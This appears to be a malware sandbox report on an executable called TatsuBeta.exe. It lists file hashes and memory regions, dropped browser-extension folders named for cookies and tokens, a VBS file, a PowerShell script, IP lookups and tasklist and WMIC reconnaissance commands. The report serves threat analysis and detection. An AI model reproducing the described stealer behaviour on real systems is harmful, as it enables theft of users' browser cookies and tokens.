SHA512 8584331d014443dd4fb4dda35578e1bcb6b4328574bd0633f91fdb8361cb0d551c0c208b5bc928ff9a7c843b23a87070a24fc36483a662110214fe3b7defe5e3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 971ada5e5d2bf3d98e1a94a57dab84e0
SHA1 fd003f21c12f98d3ccfd66e872eebe353b5aadd8
SHA256 eb6f5bcbc0b4410ed2dec27c1945643bc6817162882f36746804eb8ec5c90dc2
SHA512 07b47b65e0758203764f1827a4806f28b3853f30627b91a6a5bb8f369a3777117694e614eae4c49ebccca73ff76cc7b743af5a0298ca3027f4006d93c44b5b11

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_012aogrj.3c4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3044-609-0x000001BF758E0000-0x000001BF75902000-memory.dmp

memory/3044-612-0x000001BF5B980000-0x000001BF5B990000-memory.dmp

memory/3044-611-0x000001BF5B980000-0x000001BF5B990000-memory.dmp

memory/3044-610-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 cbf94ff8ad94c5fc6e2e30654f474927
SHA1 20cdcd764a0066cd1ccd8e62fc2d37542a5d0d36
SHA256 4692b0d645a21711746c3237a86a6c732613b81b2939602d8d78285b62b623a0
SHA512 b62cf5d35bfbc34332299409445e0acc596f6b2549e7130ec82665bf4316f1dfd42e57f6f4d5d216a6fc94d5929dec55fb65ede73e8666717d69318af322f276

memory/2644-628-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/2644-629-0x00000292A3160000-0x00000292A3170000-memory.dmp

memory/2644-632-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ede42e5af61f101ef19de6a68869d0c
SHA1 c396c7496e049b025720409babdb77d646781649
SHA256 63157cf1d6056d84a9c37010f9f6b55b9fcfdd60fe008e46b8618c0946f5394f
SHA512 df74d41ba710d238fcb210b9ec63eafbce02cbc8a6ff94e204a4cd2b330592f6ec0ddb4c488b9b879444d8a4408b0b062f1548b786f0978cff793b7dc607376e

memory/3044-616-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/1072-649-0x0000015F5D530000-0x0000015F5D540000-memory.dmp

memory/1072-653-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/5856-655-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/5856-657-0x00000279C0960000-0x00000279C0970000-memory.dmp

memory/5856-656-0x00000279C0960000-0x00000279C0970000-memory.dmp

memory/5856-667-0x00000279C0960000-0x00000279C0970000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/5856-669-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/7676-680-0x0000027E71110000-0x0000027E71120000-memory.dmp

memory/7676-683-0x0000027E71110000-0x0000027E71120000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b5655b797c26ffc04f79597d8d56eba
SHA1 8b6d6e58ab350bf1c526ed324e523f4f0cf808f0
SHA256 5893e9041f26e97ce9864f245da1211ae2570503facf24a5bb21ee7b858c9548
SHA512 89549717ce4b618fc68df01066d0cc1d3198a94e616fa84e563e5cbcd2f9aae4dff4599d5b8e013ab5e8da798c669dd41751d25f988f729bf8bc8ed0fd9645ae

memory/7676-681-0x0000027E71110000-0x0000027E71120000-memory.dmp

memory/7676-679-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ne3ylnyx.default-release\places.sqlite_tmp

MD5 c6f060e048e6ddaf0522e271e4e91978
SHA1 80af0ea60eac0f909a797812d77d65f0f439adad
SHA256 911e17e6dce12841484c4315468f5b2d58a360967ac184b7284ff6846e3fe0e6
SHA512 1ea5e8b0d592842f1ec6ff6fe710ba319940dcf649b45892ea12038883ca3cd96538621f6cc9190834df0c99be6bbf8e9e615d327b20cb4ea833131072dfbb9c

memory/7676-685-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

memory/4492-736-0x0000021E6A730000-0x0000021E6A740000-memory.dmp

memory/4492-735-0x0000021E6A730000-0x0000021E6A740000-memory.dmp

memory/4492-748-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs

MD5 3048bb46614c1eb07d5f883a207b7363
SHA1 d217a0ab3ff507c68c4095704b57d6ddc020fa48
SHA256 68c493dd10c99b69866b956efbfac41c7956b590294db41bad72550a1b49886e
SHA512 bd8b045ef54eccb1fd07782275af2e66ddc287ee20035dc2135ecd0ae3bcfcfe3b781ecb26a8c6e218f5154509371e9691e6f9b15ac3dce10202d9779bf657f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 00b5dac0faabd946e46411c68c4e4b54
SHA1 ebffe4f7312c6a3ea1a5bfb8e36e3716b73a71de
SHA256 ba0bccd5b683d96eda6d4000424147e0dddaa1e6c87dd65566721f4552397133
SHA512 25a291425f8ac169440d5a6250b2eae67261d599bd35aa3e02c742deed5aedea7d4e88910947116068759e3b8cb5fd82c29b6360d86b663fc536b09bd69ac9c0

memory/4676-787-0x0000021A9AB30000-0x0000021A9AB40000-memory.dmp

memory/4676-786-0x0000021A9AB30000-0x0000021A9AB40000-memory.dmp

memory/4676-797-0x0000021A9AB30000-0x0000021A9AB40000-memory.dmp

memory/4676-801-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

MD5 192e90432fed0081abb25295d8f309c4
SHA1 5150e93061f39e26688afd60a04c0ab14b510d47
SHA256 3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA512 9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

MD5 79f41ba1f9731c1bcb922950161750c7
SHA1 68640016af0b51566525ef43461313421f4d4421
SHA256 815b92eb30d52fece010b0fb1095b688a6d25edec9c5379591621981cfbc7d86
SHA512 53daf52b962b6695b73c9c9adf6549db11eb31a3d7cf0f5162979ee708744b33392db1b69c725030f1680cc1ca9fd0812ab834d50f067ac5cf9472f2714d2161

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 f9f83ad29d48c055a43727a0f7a4a61e
SHA1 58f1c8b28e59f58813566c89eb15ca1524224d1a
SHA256 6064de9f7f6961cb4670dd18cf6e0640f5ae757c170eb121f66e60d9d59dfa88
SHA512 b44f81f7b883e09eec8a21f7a1bd7a15e4eeb07dcd598e4f99005dc2d8ffc0419bb3a90cc4a9b5f78b9454fcd3fbe0fb68d35f55700e0c570f29e0b1f4dedb44

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

MD5 6f2197cd9bd59406dd974eec498c879f
SHA1 e82a237d0bc26e0451d670e68c3f76a7fe142e27
SHA256 ba6cbc9b6acf0e21a7f35d4efe66d778022bd91f6d1f9096ee8c4abf92e295cc
SHA512 459d47adad814a555e8f957a4fa1ff17005ee9b2326764123a4f56983454d387de0571a591f89859a31db0328b5ec31e20d1174cebaabf8d6566ccd2709e0570

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

memory/4888-896-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\salutyHOe4.ps1

MD5 4fdddf586aed433adb0bfe7362592055
SHA1 a0e31dcb709ccd9e7078529880c66611d7f418ea
SHA256 4e26e8214c7ebcb5afa23bc8f5e545dd9c8a782a7ee1d3d40531cf4ee09fbac0
SHA512 99c4fe58658e487fa54d82d1c041c2af5efdafc98dc1e079d3a250b973a435aef488e334849a0e052f6b99546df6d6518cf43b4d606edf5fc637169000ae2362

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 894afb4ff3cd7ee1f69400e936f8fc9d
SHA1 aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51
SHA256 20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9
SHA512 449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

memory/4676-785-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

memory/4492-734-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 fb0c2038a10e8bddddd3f7f512c2dde7
SHA1 30454c337256f08e2a1fae98822ce1ff66f1dbd6
SHA256 385923e026412d8ef833f348d68763dc76281d557c4640a8289bd6c082c244b8
SHA512 97b9cfe1e245fa0ee16a4de73c7431b627caf8111861afc9a6c891aab8e5babe73cfad712ef2139caf2df0faa97993bdca1c1ecc6df16e46ee72616c7946cf3a

memory/1072-650-0x0000015F5D530000-0x0000015F5D540000-memory.dmp

memory/1072-648-0x0000015F5D530000-0x0000015F5D540000-memory.dmp

memory/1072-647-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/4888-898-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

memory/4888-901-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

memory/4888-902-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 ea578928fcddad3a740de7f6ef54d80d
SHA1 ed83e8cac4c2535a5b6e828dabe9d8ad34dc3b17
SHA256 101aa9562e3afc3e05234b45a0b80f14ddec0f82feed50b52594837e0e7e564d
SHA512 87ce0f3c58e170a88d01d80d0d2337087120c466acf660d7613be52c74e3e7d5081b445b0036fd5c105cd92cad6b2f7dd9a1a880919ed77f5d4a31038ac5f135

memory/6516-912-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-911-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-922-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-921-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-920-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-919-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-918-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-917-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-916-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-910-0x0000020487B40000-0x0000020487B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 0819c074278c4a9722e84c572bbd67dc
SHA1 5a294ed6de84a2db24c041f36fb6d24e6633f02e
SHA256 b148f8e138f0afe4c80c8da7fa21e1885b12a9a2a083e4334e6d2952ab13639f
SHA512 e8d0865905071442be1c1fbdcb211e7bf57b76022a774b1b6c648908bdfa8302739e759cec52102ace937b7a8632c9a996fdc7ca84d67eed701ba945f3628b40

memory/4888-925-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win7-20231215-en

Max time kernel

16s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2076 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2076 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2076 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=992 --field-trial-handle=1196,20665401116552942,4883157833599330659,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2676 get ExecutablePath"

